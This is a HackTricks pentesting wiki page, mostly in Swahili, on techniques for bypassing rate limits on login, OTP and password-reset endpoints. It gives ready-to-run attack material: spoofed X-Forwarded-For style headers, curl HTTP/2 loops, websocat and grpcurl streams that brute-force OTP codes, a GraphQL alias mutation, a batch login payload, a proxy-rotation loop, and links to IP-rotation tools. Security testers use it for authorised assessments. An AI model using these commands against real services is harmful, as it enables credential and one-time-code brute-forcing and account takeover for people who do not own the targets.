Rate Limit Bypass

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Rate limit bypass techniques

Kuchunguza Endpoints Zinazofanana

Jitihada zinapaswa kufanywa kutekeleza brute force attacks kwenye mabadiliko ya endpoint lengwa, kama /api/v3/sign-up, ikijumuisha mbadala kama /Sing-up, /SignUp, /singup, /api/v1/sign-up, /api/sign-up etc.

Kuingiza Blank Characters katika Code au Parameters

Kuingiza blank bytes kama %00, %0d%0a, %0d, %0a, %09, %0C, %20 ndani ya code au parameters inaweza kuwa mbinu yenye manufaa. Kwa mfano, kurekebisha parameter kuwa code=1234%0a kunaruhusu kupanua majaribio kupitia mabadiliko ya input, kama kuongeza newline characters kwenye anwani ya email ili kukwepa vikwazo vya jaribio.

Kurekebisha Asili ya IP kupitia Headers

Kurekebisha headers ili kubadilisha asili ya IP inayoshuhudiwa kunaweza kusaidia kuepuka IP-based rate limiting. Headers kama X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr, X-Client-IP, X-Host, X-Forwared-Host, ikijumuisha kutumia matukio mengi ya X-Forwarded-For, zinaweza kurekebishwa kuiga requests kutoka IP tofauti.

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1

# Double X-Forwarded-For header example
X-Forwarded-For:
X-Forwarded-For: 127.0.0.1

Changing Other Headers

Inashauriwa kubadilisha vichwa vingine vya maombi kama user-agent na cookies, kwani pia vinaweza kutumika kutambua na kufuatilia mifumo ya maombi. Kubadilisha vichwa hivi kunaweza kuzuia utambuzi na ufuatiliaji wa shughuli za muombaji.

Leveraging API Gateway Behavior

Baadhi ya API gateways zimewekwa kutumia rate limiting kulingana na mchanganyiko wa endpoint na parameters. Kwa kubadilisha thamani za parameters au kuongeza parameters zisizo na umuhimu kwenye ombi, inawezekana kuzunguka mantiki ya rate limiting ya gateway, na kufanya kila ombi liwe la kipekee. Kwa mfano /resetpwd?someparam=1.

Logging into Your Account Before Each Attempt

Kuingia kwenye akaunti kabla ya kila jaribio, au kila kundi la majaribio, kunaweza kuweka upya rate limit counter. Hii ni muhimu hasa wakati wa kujaribu login functionalities. Kutumia Pitchfork attack katika zana kama Burp Suite, ili kuzungushia credentials kila jaribio chache na kuhakikisha follow redirects zimewekwa, kunaweza kusanidi upya rate limit counters kwa ufanisi.

Utilizing Proxy Networks

Kusanikisha mtandao wa proxies kusambaza maombi kwa anwani nyingi za IP inaweza kuzunguka kwa ufanisi IP-based rate limits. Kwa kupitisha trafiki kupitia proxies mbalimbali, kila ombi linaonekana kutoka kwenye chanzo tofauti, hivyo kupunguza ufanisi wa rate limit.

Splitting the Attack Across Different Accounts or Sessions

Kama mfumo unaolengwa unaweka rate limits kwa msingi wa kila akaunti au kila session, kusambaza shambulio au mtihani kwa akaunti nyingi au session mbalimbali kunaweza kusaidia kuepuka kugunduliwa. Njia hii inahitaji kusimamia utambulisho nyingi au session tokens, lakini inaweza kusambaza mzigo kwa ufanisi ili kubaki ndani ya mipaka inayoruhusiwa.

Keep Trying

Kumbuka kwamba hata ikiwa rate limit ipo, unapaswa kujaribu kuona kama jibu ni tofauti wakati OTP halali imetumwa. Katika this post, the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received.

Abusing HTTP/2 multiplexing & request pipelining (2023-2025)

Utekelezaji wa kisasa wa rate–limiter mara nyingi huhesabu TCP connections (or even individual HTTP/1.1 requests) badala ya number of HTTP/2 streams a connection contains. Wakati ile ile TLS connection inapotumika tena, attacker anaweza kufungua mamia ya parallel streams, kila moja ikibeba ombi tofauti, wakati gateway inapunguza one request tu kutoka kwenye quota.

# Send 100 POST requests in a single HTTP/2 connection with curl
seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \
-H "Content-Type: application/json" \
-d '{"code":"@"}' https://target/api/v2/verify &>/dev/null

Ikiwa limiter inalinda tu /verify lakini si /api/v2/verify, unaweza pia kuchanganya path confusion na HTTP/2 multiplexing kwa kasi sana ya kujaribu OTP au credential brute-forcing.

🐾 Kidokezo: PortSwigger’s Turbo Intruder inasaidia HTTP/2 na inakuwezesha kusanifu maxConcurrentConnections na requestsPerConnection ili kuendesha shambulio hili kiotomatiki.

GraphQL aliases & batched operations

GraphQL inaruhusu mteja kutuma queries au mutations kadhaa zinazojitegemea kimaana katika ombi moja kwa kuzianzia na aliases. Kwa sababu server hutekeleza kila alias lakini rate-limiter mara nyingi huhesabu tu ombi moja, hii ni njia ya kuzunguka (bypass) inayotegemewa kwa throttling ya login au password-reset.

mutation bruteForceOTP {
a: verify(code:"111111") { token }
b: verify(code:"222222") { token }
c: verify(code:"333333") { token }
# … add up to dozens of aliases …
}

Angalia jibu: alias moja tu itarudisha 200 OK wakati code sahihi itakapopigwa, wakati zingine zinakatizwa kwa kiwango (rate-limited).

Mbinu hiyo ilipata umaarufu kupitia utafiti wa PortSwigger juu ya “GraphQL batching & aliases” mwaka 2023 na imekuwa ikisababisha malipo mengi ya bug-bounty hivi karibuni.

Matumizi mabaya ya batch au bulk REST endpoints

Baadhi ya API zinafunua endpoints za msaada kama /v2/batch au zinakubali array of objects katika mwili wa ombi. Ikiwa limiter imewekwa mbele tu ya legacy endpoints, kufunika operesheni nyingi ndani ya ombi moja la bulk kunaweza kabisa kuepuka ulinzi.

[
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"123"}},
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"456"}}
]

Kupangilia wakati wa sliding-window

Kizuizi cha token-bucket au leaky-bucket cha kawaida kinaweka upya kwenye kikomo cha wakati kilichowekwa (kwa mfano, kila dakika). Ikiwa dirisha linajulikana (kwa mfano kupitia ujumbe wa kosa kama X-RateLimit-Reset: 27), tuma idadi ya juu kabisa ya maombi iliyoruhusiwa kabla kabisa bucket inapoweka upya, kisha mara moja tuma mlipuko mwingine kamili.

|<-- 60 s window ‑->|<-- 60 s window ‑->|
######                 ######

Uboreshaji huu rahisi unaweza kuzidisha zaidi ya mara mbili throughput yako bila kugusa bypass technique nyingine yoyote.

Kuboresha hadi WebSockets / gRPC streaming baada ya handshake

Wengi wa edge rate-limiters huangalia tu initial HTTP request. Mara tu muunganisho unapobadilishwa kuwa WebSocket (HTTP 101) au gRPC bidirectional streaming, ujumbe unaofuata mara nyingi unapita kando ya request-per-second counters kwa sababu siyo tena separate HTTP requests. Nyaraka za Cloudflare zinaonyesha kwamba ni initial upgrade request pekee inayowekwa chini ya WAF/rate-limiting rules; frames zilizotumwa baadaye ni opaque.

Mtiririko wa kazi wa vitendo:

# Flood 1,000 OTP guesses through a single WebSocket connection
seq -w 000000 000999 | websocat -n ws://target.tld/api/verify-ws

# gRPC streaming: send multiple Verify requests in one stream
grpcurl -d @ -plaintext target.tld:50051 service.VerifyOTP/Stream <<'EOF'
{ "code": "111111" }
{ "code": "222222" }
{ "code": "333333" }
EOF

Ikiwa login/OTP endpoint inatoa aina za HTTP na WebSocket/gRPC, anzisha kwanza channel iliyoboreshwa kisha tuma codes kwa msururu ndani ya muunganisho huo mmoja ili kuepuka throttles za kila ombi.

Kutumia CDN PoP‑sharded counters

Baadhi ya CDNs hugawa rate-limit counters per data center/PoP instead of globally. Cloudflare inasema wazi kuwa counters hazishirikishwi kati ya data centers. Kwa kupitia requests kupitia egress nodes katika mikoa mingi (residential proxy pools, anycast VPNs, au cloud VMs pinned to different continents), unaongeza allowed throughput: kila PoP inadumisha bucket huru kwa key sawa.

Mpangilio wa haraka na rahisi kwa kutumia open proxies (mfano na proxychains + orodha inayozunguka nchi):

for p in $(cat proxies.txt); do
HTTPS_PROXY=$p curl -s -X POST https://target/api/login -d @payload.json &
done
wait

Make sure the limiter key is not per-account; otherwise also rotate user IDs / session tokens.

Vifaa

  • https://github.com/Hashtag-AMIN/hashtag-fuzz: Zana ya Fuzzing inayounga mkono header randomisation, chunked word-lists na round-robin proxy rotation.
  • https://github.com/ustayready/fireprox: Inaunda kiotomatiki disposable AWS API Gateway endpoints hivyo kila ombi linatoka kutoka kwa anwani tofauti ya IP – kamili kwa kushinda IP-based throttling.
  • Burp Suite – IPRotate + extension: Inatumia kikundi cha SOCKS/HTTP proxies (au AWS API Gateway) kuzungusha source IP kwa uwazi wakati wa mashambulizi ya Intruder na Turbo Intruder.
  • Turbo Intruder (BApp): Injini ya mashambulizi yenye utendakazi wa juu inayounga mkono HTTP/2 multiplexing; rekebisha requestsPerConnection hadi 100-1000 ili kusinyaa mamia ya requests ndani ya connection moja.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks